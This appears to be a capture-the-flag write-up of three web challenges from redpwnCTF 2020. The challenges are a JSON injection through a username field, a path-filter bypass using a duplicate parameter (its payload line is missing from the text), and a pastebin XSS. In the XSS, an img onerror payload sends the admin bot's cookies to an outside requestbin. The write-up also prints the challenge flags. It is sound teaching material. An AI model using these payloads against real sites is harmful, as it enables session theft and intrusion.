So, for this challenge, we need to set the "member" parameter in the json to something that is not 0, ideally 1. idk all the techincal stuff but i just tried to inject stuff into the json Since we still need valid json for it to work, I first gave the name a junk value, and then closed the quote, created a new member parameter, gave it the value 1, and then finally created a random parameter with a junk value to make sure it was valid json. Final payload (just use this as a username) hi","member":1,"hi":"hi
which gets you the flag: flag{t0ny_5uck5_47_w3b_l0l}
There are two checks made to the page parameter:
If the first char is not alphanumeric, remove it, and keep removing until an alphanumeric char is found
If the string "../" (and basically all variants, url encoding etc.) are present, replace them with nothing, and keep replacing until none are left.
We can bypass this by having a decoy path parameter as something random (as long as its not an actual dir i think its fine), and then having an "&&path=" to add another path variable, which is unfiltered.
Therefore, our final payload becomes:
which gets us our flag!
So first things first, create a pastebin. When you go to the display, you'll see a url like https://static-pastebin.2020.redpwnc.tf/paste/#PjxpbWcgc3JjPXggb25lcnJvcj0iZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj11YjgyWGIxQzhvcyciPg==
That looks kinda like base64, and if you base64 decode the thing after https://static-pastebin.2020.redpwnc.tf/paste/# you'll find it decodes to the content of the pastebin! This allows us to easily create pastebin messages.
There's also an admin bot submit form, where we can submit a url, and the admin bot will visit it.
Rak found that the xss ><img src='' onerror="javascript code">
First, we can try a simple redirect. ><img src='' onerror="document.location='requestbinurl'">
. I set up a requestbin for this purpose. Remember: we base64 encode the payload, and append it to the major part of the url.
https://static-pastebin.2020.redpwnc.tf/paste/#PjxpbWcgc3JjPScnIG9uZXJyb3I9J2RvY3VtZW50LmxvY2F0aW9uPSJodHRwOi8vcmVxdWVzdGJpbi5uZXQvci8xbGZyZnlpMSInPg==, as a sample, works, sending a request to our requestbin. Let's exfiltrate some information. We can use GET parameters to exfiltrate data.
><img src='' onerror='document.location="http://requestbin.net/r/1lfrfyi1?thing=" + document.cookie'>
This would redirect the admin to our requestbin, sending the cookies as the "thing" parameter. Base64 encoding and submitting this as a url, a request on the requestbin pops up with the parameters ?thing=flag=flag{54n1t1z4t10n_k1nd4_h4rd}, giving us the flag,